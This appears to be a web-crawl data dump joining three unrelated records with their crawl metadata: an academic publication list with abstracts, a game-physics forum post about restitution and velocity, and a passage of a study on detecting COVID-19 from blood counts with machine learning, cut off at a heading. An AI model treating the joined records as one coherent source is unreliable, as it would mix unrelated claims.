Kamel H, Syms R, Kardoulaki EM, Rea Met al., 2017, Metamaterial MRI-based Surgical Wound Monitor, 2017 11th International Congress on Engineered Material Platforms for Novel Wave Phenomena (METAMATERIALS), Publisher: IEEE, Pages: 334-336
Conference paper
Syms R, 2017, Rapid evaporation-driven chemical pre-concentration and separation on paper., Biomicrofluidics, Vol: 11, ISSN: 1932-1058
Airflow-enhanced evaporation is investigated as a method for rapid chemical preconcentration on a thin porous substrate. The mechanism is described by combining 1D models of capillary rise, chromatography, and pervaporation concentration. It is shown that the effective length of the column can be shorter than its actual length, allowing concentrate to be held at a stagnation point and then released for separation, and that the Péclet number, which determines the concentration performance, is determined only by the substrate properties. The differential equations are solved dynamically, and it is shown that faster concentration can be achieved during capillary filling. Experiments are carried out using chromatography paper in a ducted airflow, and concentration is quantified by optical imaging of water-soluble food dyes. Good agreement with the model is obtained, and concentration factors of ≈100 are achieved in 10 min using Brilliant Blue FCF. Partial separation of Brilliant Blue from Tartrazine is demonstrated immediately following concentration, on a single unpatterned substrate. The mechanism may provide a method for improving the sensitivity of lab-on-paper devices.
Journal article
Syms RRA, Liu D, Ahmad MM, 2017, Nanostructured 2D cellular materials in silicon by sidewall transfer lithography NEMS, Journal of Micromechanics and Microengineering, Vol: 27, ISSN: 0960-1317
Sidewall transfer lithography (STL) is demonstrated as a method for parallel fabrication of 2D nanostructured cellular solids in single-crystal silicon. The linear mechanical properties of four lattices (perfect and defected diamond; singly and doubly periodic honeycomb) with low effective Young's moduli and effective Poisson's ratio ranging from positive to negative are modelled using analytic theory and the matrix stiffness method with an emphasis on boundary effects. The lattices are fabricated with a minimum feature size of 100 nm and an aspect ratio of 40:1 using single- and double-level STL and deep reactive ion etching of bonded silicon-on-insulator. Nanoelectromechanical systems (NEMS) containing cellular materials are used to demonstrate stretching, bending and brittle fracture. Predicted edge effects are observed, theoretical values of Poisson's ratio are verified and failure patterns are described.
Journal article
Syms RRA, Floume T, 2017, Parasitic coupling in magneto-inductive cable, Journal of Physics D: Applied Physics, Vol: 50, ISSN: 0022-3727
Magneto-inductive (MI) waveguides are linear arrangements of magnetically coupled L–C resonators that propagate electrical energy at radio frequency without direct connection. To achieve the strong magnetic coupling needed for low-loss propagation, adjacent elements must be in such close proximity that electric coupling arises. In contrast to electric coupling in split ring resonators, the coupling occurs between the inductive tracks of adjacent resonant loops. Parasitic capacitance is demonstrated in flexible magneto-inductive cable, and shown to introduce additional propagation bands above the MI band. Simple models are developed to predict this effect, and strategies discussed to improve high-frequency isolation.
Journal article
Kardoulaki EM, Syms RRA, Young IR, 2016, MRI for noninvasive thermometry, eMagRes, Vol: 5, Pages: 1203-1217, ISSN: 2055-6101
MRI was recognized for its potential use as a noninvasive in vivo thermometer 30 years ago. Today, the most popular application of MR thermometry is the guidance of thermal therapies for the treatment of cancer and other pathologies. These minimally invasive operations are routinely performed on patients who are not eligible for surgery in approximately 40 medical centers globally. The aim is to deliver or abduct thermal energy in order to cause local tissue necrosis or to sensitize a lesion to chemotherapy or radiotherapy without causing harm to the surrounding healthy tissue. Here we explain the principles of operation of MR thermometry and provide a critical review of the proposed methods, highlighting remaining fundamental and technical issues as well as recent progress. Emphasis is placed on hardware advances (RF receivers) for improved signal-to-noise ratio (SNR) which would lead to better accuracy, spatiotemporal resolution, and precise calibration. We conclude with a general outlook for the field.
Journal article
Kardoulaki EM, Syms RRA, Young IR, Rea Met al., 2016, SNR in MI catheter receivers for MRI, IEEE Sensors Journal, Vol: 16, Pages: 1700-1707, ISSN: 1530-437X
Internal coils have a signal-to-noise ratio (SNR) advantage during magnetic resonance imaging. However, coils with continuous cables are generally unsafe, due to the risk of RF heating. Segmented cables, such as magneto-inductive waveguides, should introduce inherent safety at the price of increased noise, from both the cable and the body. Here, we derive analytical SNR expressions for both types of noise, develop a model to compare the SNR of different types of receiver, and validate the model with data from imaging experiments at 3T. Experiments and theory confirm that body noise does not prevent an SNR gain compared with an eight-element external coil, even when a long section of waveguide is loaded with tissue.
Journal article
Syms R, Wright S, 2016, MEMS Mass Spectrometers: the Next Wave of Miniaturization, Journal of Micromechanics and Microengineering, Vol: 26, ISSN: 1361-6439
This paper reviews mass spectrometers based on micro-electro-mechanical systems (MEMS) technology. The MEMS approach to integration is first briefly described, and the difficulties of miniaturizing mass spectrometers are outlined. MEMS components for ionization and mass filtering are then reviewed, together with additional components for ion detection, vacuum pressure measurement and pumping. Mass spectrometer systems containing MEMS sub-components are then described, applications for miniaturized and portable systems are discussed, and challenges and opportunities are presented.
Journal article
Syms R, Solymar L, 2015, A dynamic competition model of regime change, Journal of the Operational Research Society, Vol: 66, Pages: 1939-1947, ISSN: 1476-9360
A dynamic competition model for an oppressive government opposed by rebels is proposed, based on coupled differential equations with constant coefficients. Depending on their values, the model allows scenarios representing a stable, oppressive government and violent regime change. With constant coefficients, there can be no limit cycles. However, cycles emerge if rebels and governments switch characteristics after a revolution, if resources change hands and rebel motivations switch from grievance to greed. This mechanism is proposed as an explanation for the establishment of a new repressive regime after the overthrow of a similar regime.
Journal article
Mokhtar MHH, Syms RRA, 2015, Tailored fibre waveguides for precise two-axis Lissajous scanning, Optics Express, Vol: 23, Pages: 20804-20811, ISSN: 1094-4087
A two-axis optical imaging system using a Lissajous scan pattern with non-integer frequency ratio is presented. A waveguide with precisely tuned mechanical resonant frequencies is constructed by dip coating two fibres with a transparent polymer. Motion is achieved by mounting a waveguide cantilever at 45° on a single piezoelectric actuator with a dual-frequency drive. Confocal signal collection is achieved using a mode-stripping detector, and feedback signals needed for frequency and phase locking are derived from intermittent reflection from an apertured mirror. The first scan axis is locked to the resonance of one of the modes, while the second scan axis is locked to the correct phase at the desired frequency ratio. Accurate acquisition of two-dimensional images is demonstrated.
Journal article
Kardoulaki EM, Syms RRA, Young IR, Rea M, Gedroyc WMWet al., 2015, Thin-film micro-coil detectors: Application in MR-thermometry, Sensors and Actuators A: Physical, Vol: 226, Pages: 48-58, ISSN: 1873-3069
Journal article
This data is extracted from the Web of Science and reproduced under a licence from Thomson Reuters. You may not copy or re-distribute this data in whole or in part without the written consent of the Science business of Thomson Reuters.
Request URL: http://wlsprd.imperial.ac.uk:80/respub/WEB-INF/jsp/search-html.jsp Request URI: /respub/WEB-INF/jsp/search-html.jsp Query String: respub-action=search.html&id=00005787&limit=30&person=true | 2022-09-25 18:24:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4211511015892029, "perplexity": 6980.783509912652}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334591.19/warc/CC-MAIN-20220925162915-20220925192915-00466.warc.gz"} |
http://www.gamedev.net/index.php?app=forums&module=extras§ion=postHistory&pid=4935326 | • Create Account
### #Actualdabo
Posted 27 April 2012 - 02:44 AM
I have looked around a bit more and I've seen examples of implementations where only the vertical component of the velocity vector is affected by the coefficient of restitution; the horizontal component is only affected by friction. Is this correct? If so my code above is incorrect and it would explain why my puck slows down so much horizontally when it bounces. But I am not sure the angle of the bounce is correct if only the vertical component is affected by COR. Could anyone clarify this please?
The last line above would be this instead:
velocity.Y = 0.267 * velocity.Y;
### #1dabo
Posted 27 April 2012 - 02:43 AM
I have looked around a bit more and it seems in some implementations only the vertical component of the velocity vector is affected by the coefficient of restitution; the horizontal component is only affected by friction. Is this correct? If so my code above is incorrect and it would explain why my puck slows down so much horizontally when it bounces. But I am not sure the angle of the bounce is correct if only the vertical component is affected by COR. Could anyone clarify this please?
The last line above would be this instead:
velocity.Y = 0.267 * velocity.Y;
PARTNERS | 2013-12-19 22:35:44 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5478763580322266, "perplexity": 324.37585124082466}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-48/segments/1387345768537/warc/CC-MAIN-20131218054928-00054-ip-10-33-133-15.ec2.internal.warc.gz"} |
https://www.nature.com/articles/s43856-022-00129-0?error=cookies_not_supported&code=a053c316-d822-4b40-8db0-c548345e9d88 | ## Introduction
At the end of 2019, the Severe Acute Respiratory Syndrome Coronavirus 2 (SARS-Cov-2) appeared in the city of Wuhan, China1, which led to a global outbreak weeks later2. This highly transmissible novel Coronavirus disease was named Coronavirus disease 2019 (COVID-19)3. At the time this article is being written, over 400 million cases of COVID-19 infections and over 5.7 million deaths have already been reported worldwide. One of the main challenges for its diagnosis is the list of initial symptoms: fever, dry cough and/or tiredness4, which are all common in many other respiratory diseases.
Currently, the golden-standard tests for SARS-Cov-2 direct detection include the Reverse Transcription Polymerase Chain Reaction exam (or simply, RT-PCR) and the serology count analysis. The first action of the RT-PCR exam is the use of the enzyme reverse transcriptase to transform the RNA of the virus into complementary DNA. RNA is produced from a DNA molecule and presents information with which it is possible to coordinate the production of proteins. With a complementary probe to a particular virus, it is possible to verify whether the molecular content corresponds to that of the suspected infectious agent. However, in particular, for the case of SARS-Cov-2, the RT-PCR is more efficient at the peak of the infectious cycle5. This leads to high false-negative occurrences with a sensitivity rate of between 50% and 62% according to6,7. Authors in ref. 8 verified instances of over 20% infected individuals with a positive RT-PCR result only after two consecutive false-negative results. Serology exams have been found to reach a sensitivity and specificity rate of 0.95 + but only after 15–28 days of symptom onset9. Furthermore, both exams are relatively expensive and results take longer to process when compared with other kinds of laboratory tests, such as the complete blood count.
CBCs are extensively used for general individual diagnosis10. As a low-cost test that measures analyte levels of the white and red series in the blood, it is a useful tool to support medical decisions, as intrinsic variations of analytes can bring relevant insights regarding potential diseases. Patients with most kinds of infectious diseases have noticeable changes in their CBC tests. However, proving that these results can be interpreted as sufficient to support a particular diagnosis is a considerably more difficult task, as changes in analyte values could be easily confounded for different diseases’ patterns.
In analyzing complete blood counts of individuals with COVID-19 infection in isolation, we find some changes to be quite characteristic of the disease11,12,13. This implies that machines, which can detect patterns not easily noticeable by humans, could be employed for automatic detection and preliminary screening of the disease. Indeed, many models have been proposed for automated COVID-19 diagnosis through CBCs and omics data. We argue that the detection performance of these models is possibly biased—or overestimated—as many patterns are not unique to SARS-Cov-2. The performance of these models will likely drop significantly as the prevalence of other respiratory viruses increases. This work employs a dataset collected between 2016 and 2021 containing exams of individuals who underwent blood tests in conjunction with RT-PCR exams throughout Brazil, both for COVID-19 and for other pathologies like Influenza-A or H1N1. More specifically, our dataset includes individuals who underwent a CBC at an interval of 60 days before or after a RT-PCR test.
For 2020 and 2021 we collected laboratory data for 900,220 unique individuals, 809,254 CBCs, and 1,088,385 RT-PCR tests, of which 21% (234,466) were positive and less than 0.2% (1679) were inconclusive. This work does not investigate demographic, prognostic, or clinical data, such as ethnicity, hospitalization, or symptomatology, as these fall out of laboratory scope. We propose modeling the task as a binary classification problem and analyzing two distinct timeframes: one considering the early pandemic stage, namely the first wave of COVID-19 cases in Brazil; and a second stage after November 2020, when the second wave of COVID-19 started, and when we saw the emergence of a new variant of concern, P1, which eventually led to the health system collapse in the capital state of Amazonas in late December14,15.
One of the key highlights of our proposed approach is the analysis of other RNA respiratory viruses. We also collected 120,807 CBCs from 2016 to 2019 of 16,940 individuals who tested positive for Influenza-A, Influenza-B or H1N1, as well as other respiratory viruses, and additionally 307,978 unlabeled CBCs. In particular, these additional CBCs included exams from the 2016 H1N1 surge in São Paulo16, during which the population developed similar hygienic habits to the ones recommended in 2020, like social distancing and the use of masks, although at a minor scale. To the best of the authors’ knowledge, this is the most extensive and comprehensive COVID-19-related dataset to date.
We follow the guidelines provided by the IJMEDI checklist17 regarding applying machine learning to medical data, allowing for both higher quality work and an easier reproducibility and understanding of results. Our analysis focused on patients older than 18 years. We believe more experiments are necessary to assert performance for children and teens under 18 years old, but data regarding these age groups was also present in all training and test sets.
Throughout our experiments, we train an ensemble of machine learning models on this million-scale dataset to predict Sars-CoV-2-positivity. To guarantee the correct labeling of training instances, we focus on the CBC results as close to the first positive result as possible. Our analysis shows that the additional data from other RNA respiratory viruses is a fundamental aspect for properly screening COVID-19. In the absence of such information, models are prone to confound SARS-Cov-2 with other respiratory viruses or infections. This finding corroborates with many studies that raised concerns regarding bias in COVID-19 research18,19,20. We also demonstrate the necessity of maintaining a model as up-to-date as possible to allow any machine learning model to keep up with the different stages of a pandemic surge. Our model retains high-performance values across multiple evaluation scenarios and on simulations with varying prevalences of COVID-19, properly differentiating Sars-CoV-2 from other confounding viruses, thus demonstrating the robustness of our approach.
## Methods
### Data
The Fleury database structure was created on 10/1997 using an InterSystems Caché and Ensemble, version 1.4 (Caché, InterSystem, 2018; https://docs.intersystems.com/; November 2020), a high-performance architecture that is commonly used to develop software applications for healthcare management (Cambridge MA). The database was built using standard healthcare industry practices to ensure accuracy, completeness, and security of data collected. The results of the laboratory tests are automatically inserted into a Microsoft SQL database after verification of the RT-PCR output. Within a few seconds, data are replicated to the Cache Database—Intersytems—for permanent storage. Once stored in the database, the result is made available for patients. All users have a username and password, maintained by AD Windows (Active Directory). All registry changes to the database are tracked through a log and are restricted to users with high-level administrative permissions. Information is kept secure through a separate network firewall, accessed only by authorized persons within the Fleury Group’s domains. Data stored in this database has been used previously in several clinical studies before theCOVID-19 outbreak21,22,23,24,25,26.
This project was submitted, evaluated, and approved by the Research Ethics Committee (CEP) of Grupo Fleury (CAAE: 33790820.3. 0000.5474), duly qualified by the National Research Ethics Committee (CONEP) of the National Health Council of Brazil. The Research Ethics Council (CEP) is an interdisciplinary and independent collegiate of public relevance, consultative, deliberative, and of educational character, created to defend the interests of research participants in their integrity and dignity as well as to contribute research development within highest ethical standards. By decision of the CEP, since this project uses retrospective and anonymized data, there is no need to apply an e Free and Informed Consent Term (TCLE) to participating patients.
The CBC measurements were obtained from EDTA-K3 collected peripheral blood samples analyzed by the Automated Hematology Analyzer XT or XN series from Sysmex (Sysmex Corporation, Kobe, Japan). In total, 72 pieces of equipment are distributed in 36 laboratories over the country. Red blood cells (RBC) and platelets were counted and sized by direct current impedance with hydrodynamic focusing and heath flow direct current (DC) detection was used. The hematocrit was determined from the RBC pulse height. The hemoglobin was measured using sodium lauryl sulfate spectrophotometry. CBCs also include the physical features of the RBC: Mean corpuscular volume (MCV) is a measurement of the average size of red blood cells; Mean corpuscular hemoglobin (MCH) is a calculated measurement of the average amount of hemoglobin; Mean corpuscular hemoglobin concentration (MCHC) is a calculated measurement of the average concentration of hemoglobin; and Red cell distribution width (RDW) is a measurement of the variation in RBC size. The white blood cells (WBC) and six-part differential were determined by fluorescence flow cytometry. Specifically, the WBC subpopulations were separated based on cell complexity (side-scattered fluorescent intensity), cell size (forward scattered light), and fluorescence signal (side fluorescent light).
Quality control is performed daily using three control levels (high, normal, and low) for each parameter. Measurements are analyzed using the InsightTM Interlaboratory Quality Assessment Program for Sysmex hematology analyzers, where data from users worldwide are compared. To guarantee equivalence and reproducibility of our analysis and enable the use of common reference intervals for different measurement procedures27, harmonization of equipment is performed in accordance with the Clinical and Laboratory Standards Institute’s (CLSI) guidelines28. Results are accepted if the percentage difference is less than 50% of the total error for each parameter, which allows us to devise reference values for each measurement29,30.
### Complete blood count and model features
A complete blood count (or simply, CBC) is a common blood test used for a variety of reasons, including the detection of disorders and infections. A CBC test measures several components and features in the blood, including RBC, which carry oxygen; Hemoglobin, the oxygen-carrying protein in red blood cells; Hematocrit, the proportion of red blood cells to the fluid component; WBC, which fight infection (i.e., Monocytes, Lymphocytes, Eosinophils, Basophils, Neutrophils); and Platelets, which help with blood clotting.
Abnormal increases or decreases in cell counts may indicate an underlying biological process taking place, like inflammation or immune response. Also, values such as the Neutrophil-Lymphocyte ratio, Platelet-Monocyte ratio, or the Platelet-Lymphocyte ratio are recognized as inflammatory markers31. Table 1 shows analyte means and standard deviations, as well as the employed units of measure in each of our cohorts. We can easily identify some patterns that might help us in sorting COVID-19 infected patients from the remaining ones. We can also clearly perceive that the distributions for each gender are slightly different. This is to be expected, as it is known that CBC values vary with age and gender32. However, introducing an explicit gender variable into our model could entail bias. To avoid this, we instead normalize each analyte by the corresponding gender and age reference values devised by Grupo Fleury, thus building a unified model that considers CBC analyte values regardless of gender.
Specifically, we perform normalization by employing the reference ranges as a pivot. Let R be the reference values of an analyte, the general formula scaling features is given as
$$x^{\prime} =\frac{x-{{\Omega }}(R(x| {{{{{{{\rm{sex}}}}}}}}=s,{{{{{{{\rm{age}}}}}}}}=a))}{O(R(x| {{{{{{{\rm{sex}}}}}}}}=s,{{{{{{{\rm{age}}}}}}}}=a))-{{\Omega }}(R(x| {{{{{{{\rm{sex}}}}}}}}=s,{{{{{{{\rm{age}}}}}}}}=a))}$$
(1)
where x is an original value, $$x^{\prime}$$ is the normalized value, R(xsex = s, age = a) describes the reference values for x given the sex s and age a of a patient, and Ω and O represent the lower and upper bounds respectively. For example, supposing a male adult presents a 5.0 millions/mm3 RBC and knowing that the reference values lie in the range [4.30 − 5.70], we first subtract 4.30 from 5.0 and divide the result by 1.4 (the difference between the maximum and minimum reference values), thus obtaining the normalized 0.5 RBC count. Consequently, normalized values above 1 represent abnormally high cell counts. Likewise, normalized values below 0 represent abnormally low counts. Our model analyzes normalized cell counts and their corresponding pairwise ratios as potential features for building our models.
The performance of machine learning methods are heavily dependent on the choice of features on which they are applied33. For this reason, much of the current effort in deploying such algorithms goes into the design of preprocessing pipelines and data transformations that result in a representation of data that can support effective machine learning33,34,35. The process of using available features to create additional ones to improve model performance is often called ’feature engineering’, a predominantly human-intensive and time-consuming step that is central to the data science workflow. It is a complex exercise, performed in an iterative manner with trial and error, and mostly driven by domain knowledge36. Recently, many studies have shown the benefits of automatizing this process by creating candidate features in a domain-independent and data-driven manner followed by an effective method of feature selection. This way it is possible not only to improve model correctness but also to discover powerful new features and processes that could be additional candidates for domain-specific studies36,37,38. We avoid potential spurious correlations by confirming that all selected features present a strictly non-zero impact on model output after n-fold cross-validation.
### Inclusion–exclusion criteria
The scale of our dataset allows us to produce high-quality training sets and massive validation sets. Table 2 provides the gender and RT-PCR results distribution employed for training and evaluating our models. In addition to SARS-Cov-2, Influenza-A, Influenza-B, and Influenza-H1N1, our dataset also comprehends a variety of other viruses, including Coronavirus OC43, Human Metapneumovirus A, Adenovirus, Parainfluenza 1, Coronavirus HKU1, Enterovirus B, Parainfluenza 2, Coronavirus NL63, Respiratory Syncytial Virus A, Mycoplasma pneumoniae, Respiratory Syncytial Virus B, Rhinovirus, Human Metapneumovirus B, Coronavirus 229E, Chlamydophila pneumoniae, Bordetella pertussis, Parainfluenza 3, Bocavirus, and Parainfluenza 4. We argue that taking this variety of confounding viruses into consideration is of utmost importance to learn models that are specific for COVID-19.
#### Safe labeling
It is worth mentioning that CBCs and RT-PCRs are part of different exam batteries, and are therefore often collected on different dates for the same individual. Thus, an important decision is the ideal time frame between the collection of a CBC and that of the RT-PCR test used to validate its label. It is challenging to validate the precise moment the infection has initiated considering the lack of information concerning the onset of symptoms. We also observed abnormalities in the CBCs associated with recovered individuals. These differences could be related to drug usage and/or other therapies, or be due to symptoms that persist even after the virus has been eliminated. In this context, we have the hypothesis that CBCs, even when associated with a positive RT-PCR, may be affected by treatment-related effects. Figure 1 shows the concentration distribution of some analytes along with the disease progression time frame. The lower the ratio between white blood cells (WBC) and red blood cells (RBC), the higher is the probability of the individual being positive for COVID-19. Additionally, we observed that the lowest value for this ratio lies on day 0. Since our working dataset consists of patients who went to one of Grupo Fleury’s laboratories to undertake an exam, we hypothesize that the search for an RT-PCR, in particular for patients who obtained a confirmatory diagnosis of COVID-19, might be associated with the start of symptoms onset, explaining this particular pattern. We did not observe similar behavior for other evaluated viruses, perhaps due to the relative difference in public awareness/concern regarding SARS-Cov-2 and Influenza infections.
Furthermore, we also observed that most analytes tend to present abnormal values for up to 30 days. This might be related to the natural evolution of COVID-19 onto the inflammatory stage, the effects of treatments, or even long-lasting effects on patients’ immunological systems. We concluded that the safest and most effective gap to use for labeling CBCs with RT-PCRs outcomes’ is the 24-h window centered on the first positive RT-PCR result of an individual, with the remaining frames being highly uncertain about a positive diagnosis, and thus discarded.
#### Removing gender and age biases
Supplementary Figure 1 presents the age distribution of each pathology subset. We verify a small prevalence in male positive COVID-19 cases and Female positive Influenza. To address this, we sub-sampled the training sets to remove possible biases that could jeopardize learning and validated unsampled data to properly verify model behavior in real-world scenarios.
#### Removing possible false-negative cases
Another point of attention is the possible existence of false-negative results for RT-PCR exams. In particular, we often see cases of the same individual having negative results interspersed with two or more positive results. Therefore, it is also necessary to carry out a preprocessing step to guarantee authenticity of negative labels and to ensure that the model is as faithful as possible to the real scenario of COVID-19, and not to the limitations of the RT-PCR exam. We filter out any negative RT-PCR results issued after the first positive RT-PCR result, thus focusing our analysis on pre-covid individuals and those on the preliminary stages of the infection. We also consider individuals that never had any contact with SARS-Cov-2 in our negative cohort, namely individuals with exams dating before 2020.
### Outbreak waves
Table 2 also shows training and validation sets for the two waves that occurred during the COVID-19 outbreak in Brazil. The training set for the first wave comprises labeled CBCs acquired until 26 June 2020, whilst its validation set comprises labeled CBCs acquired between 27 June 2020 and 05 September 2020. The training set for the second wave comprises labeled CBCs acquired until 30 September 2020, whilst its validation set comprises labeled CBCs acquired between 01 October 2020 and 28 February 2021. Both training and validation sets contain data corresponding to viruses other than SARS-Cov-2: the training sets contain instances from 2016 to 2018, while the validation sets contain instances from 2019.
### Statistics and reproducibility
Our main objective is to demonstrate that training a model directly on COVID-19 data is not enough to guarantee robustness if multiple respiratory infections are present, as might be expected to occur in a possible COVID-19 endemic scenario. This is true even in the case of a massive dataset such as the one we employed for our study. Thus, we built resilient models for a pre-selected case of core confounding viruses and showed that we can retain similar COVID-19 detection performance in a scenario containing the prevalence of COVID-19 as well as achieving high discriminatory figures in low-prevalence scenarios with an abundance of other respiratory infections. Furthermore, we also demonstrate that the model indeed learns useful relationships between CBC patterns and other respiratory infections. To ensure the relevance of the results, we assess the statistical significance of our measurements through a pairwise t-test39 with p-value ≤ 0.05 and through 5-fold cross-validation.
#### Model training
Our models were trained with the objective of distinguishing CBCs (+) from CBCs () (refer to Table 2). We followed a stacking procedure, that is, the training stage consists of creating multiple specialized models for each of the viruses considered (i.e., COVID-19, Influenza-A, Influenza-B, Influenza-H1N1, and other viruses) and then combining their outputs to obtain a final prediction about the target disease. We divided the training samples into two equally sized batches. The first one was used to train the specialized models and the second one to train the final stacked model. Each specialized model only had access to label information regarding the corresponding virus, and the stacking model employs CBC (+) and CBC (−) labels.
Both specialized models as well as the final stacking model were trained with lightGBM40, a fast implementation of a tree-based gradient boosting technique. We employed the SHAP algorithm41,42,43 to obtain an interpretation of the model’s prediction, allowing us not only to have a probability that a specific CBC is associated with a positive RT-PCR for COVID-19 but also an explanation consisting of the feature importance leading to the model decision. We assessed performance by calculating AUROC, sensitivity and specificity in the validation sets as well as running 5-fold cross-validation in the training sets. Supplementary Figure 2 illustrates the proposed approach’s pipeline. We performed extensive grid-search for hyperparameter tuning for all the aforementioned models. Our final models employ 100 Gradient-Boosted Decision Trees estimators with a maximum tree depth of 50 and a maximum number of leaves of 50. The learning rate was set to 2e−1 optimizing the binary cross-entropy function.
#### Selecting specialized models
Not all CBC analytes are relevant features for differentiating the base targets (i.e., each virus), and some features may be detrimental to the task. To find a set of relevant features, we represent the model space as a directed acyclic graph (DAG) in which each node represents a distinct feature subset, and vertex A → B is connected if B can be reached by simple feature addition from A, thus representing a transitive reduction of the more complex combinatorial complete model space. This modeling approach presents two desirable properties: the first being that any vertex is reachable from the $$[{{\emptyset}}]$$ model, the second being that, for any feature set path, there exists a topological ordering, an ordering of all vertices into a sequence such that for every edge, the start vertex occurs earlier in the sequence than the ending vertex of the edge. These properties imply a partial ordering of the graph starting from the root node, which allows us to search it in an orderly manner. We apply the A* algorithm44, employing as heuristic the AUROC of the model represented by the feature set of a given vertex. We hypothesize that there exists a set of optimal feature expansions that lead to the best-performing models for each specific base task. This allows us to search the N! combinatorial space of feature subsets to select the best performing specialized models.
#### Learning the final model
Our stacking definition extends all previously related COVID-19 learning approaches by building specialized models targeted at confounding viruses. When building the final model, we can expect to learn prediction relationships between COVID-19 and other respiratory infections. For example, in a scenario of a moderately high chance of Influenza, we would need an exceedingly high COVID-19 probability to confirm a positive infection hypothesis.
### Reporting summary
Further information on research design is available in the Nature Research Reporting Summary linked to this article.
## Results
### Features and model effectiveness for COVID-19 identification
Our first set of experiments is dedicated to validating that CBCs are useful sources of information for identifying SARS-Cov-2 virus infection. It is worth mentioning that in this initial experiment we did not employ information about infections other than COVID-19 while training the model, that is, CBC (−) is composed only by the sub-population in COVID-19 (−). We trained a COVID-19 model with the labeled CBCs within the first two quarters of 2020 and evaluated it onto the labeled CBCs within the third quarter of 2020. Supplementary Fig. 3 shows the AUROC improvement as we proceed to include more features in the COVID-19 model. We can verify that employing only three features is already enough to surpass the 0.85 AUROC mark. Our final COVID-19 model achieves an AUROC of 0.922, specificity of 0.918, and sensitivity 0.824, thus clearly indicating the potential of employing large volumes of CBCs to identify SARS-Cov-2 virus infection. Figure 2 presents the 15 most important features identified by our algorithm as well as their contribution to the final specialized COVID-19 model prediction.
### SARS-Cov-2 Mutations and Variants
By mid-November 2020, Brazil entered the second wave of COVID-19, which eventually led to the collapse of the health system in Manaus, capital of Amazonas, a state in Brazil45. One of the explanations raised by the local government was the emergence of a new COVID-19 variant, known as 20J/501Y.V3—or simply P.114. To evaluate the performance of our COVID-19 model as the SARS-Cov-2 virus mutates, we trained it at two distinct points in time. The first one, which we will refer to as the “First-wave model”, was trained using the training set associated with the first wave (as shown in Table 2). The second, which we will refer to as the “Second-wave model” was trained using the training set associated with the second wave in Brazil (as shown in Table 2).
Figure 3 presents the AUROC obtained after the application of each of these two models during the pandemic, up to March-2021, considering a 7 days sliding window, as well as the respective COVID-19 prevalence (i.e., the proportion of positive cases over all RT-PCR exams in a given period). We investigate three periods of interest: R(t) > 1.00, a period in which the SARS-Cov-2 reproduction number was above 1.00 uninterruptedly for several days. During this period the virus spread quickly through the entire country; Christmas + New Year day, a period in which families reunite, spreading the virus and resulting in a clear increase in COVID-19 cases and observed in the entire country; and Carnival, a period in which large crowds fraternize. Carnival events were canceled for 2021, but many gatherings were reported in some regions of the country, such as Rio de Janeiro, Natal, and Recife.
The performance of the First-wave model seems to deteriorate with time, mostly as a result of periods of high COVID-19 prevalence due to SARS-Cov-2 variants. On the other hand, the Second-wave model reaches AUROC values as high as 0.952. Interestingly, the periods we analyzed affected the two models in different ways, but the experiment highlights the importance of retraining the models so that they can account for eventual virus variants.
### Identifying SARS-Cov-2 in the presence of other RNA respiratory viruses
Our previous set of experiments verified the performance of our models in predicting the COVID-19 RT-PCR result from complete blood counts. However, a key concern remained regarding the ability to distinguish between different respiratory viruses. Thus, after a careful study, we further trained specialized models in an attempt to predict the RT-PCR result for various types of Influenza and other respiratory viruses. Our approach employs stacking to combine the outputs of each specialized model (i.e., COVID-19, Influenza-A, Influenza-B, H1N1, etc.) to perform a final prediction for COVID-19. Specifically, we used half of the training data to learn specialized models, and the other half to train the final stacked model. As illustrated in Fig. 4, our stacked COVID-19 model achieves performance as high as 0.913 (cross-validation on the stacking training sets shown in Table 2) and 0.917 (using stacked training and validation sets shown in Table 2) while retaining 0.80 sensitivity and 0.91 specificity.
While the stacked model achieves high-performance predicting COVID-19, it is also important to verify its specificity by analyzing the predictions performed for individuals infected with viruses other than SARS-Cov-2. Figure 5 shows how different models perform specifically on individuals that were infected by some viruses in 2019. The ideal result would be all predictions being negative for COVID-19. As discussed before, models trained solely on SARS-Cov-2 data are very effective in identifying COVID-19 cases, but the result of 2019 data indicates that these models performed poorly on other viruses (Fig. 5a). Including viruses other than SARS-Cov-2 during training increases the performance on 2019 data (Fig. 5b). The stacked model proves to be much more specific for COVID-19 than both previous models (Fig. 5c).
Figure 6 also investigates the specificity of the stacked model by showing the prediction distribution on the 2019 data (i.e., individuals infected by a virus other than SARS-Cov-2). The stacked model associates 0−10% COVID-19 probability to roughly 44% of the predictions on 2019 data. Furthermore, the stacked model correctly places almost 80% of the evaluated individuals below the 30% COVID-19 prediction mark, with over 40% being placed below the 7% probability mark.
### Simulating endemic-pandemic scenarios
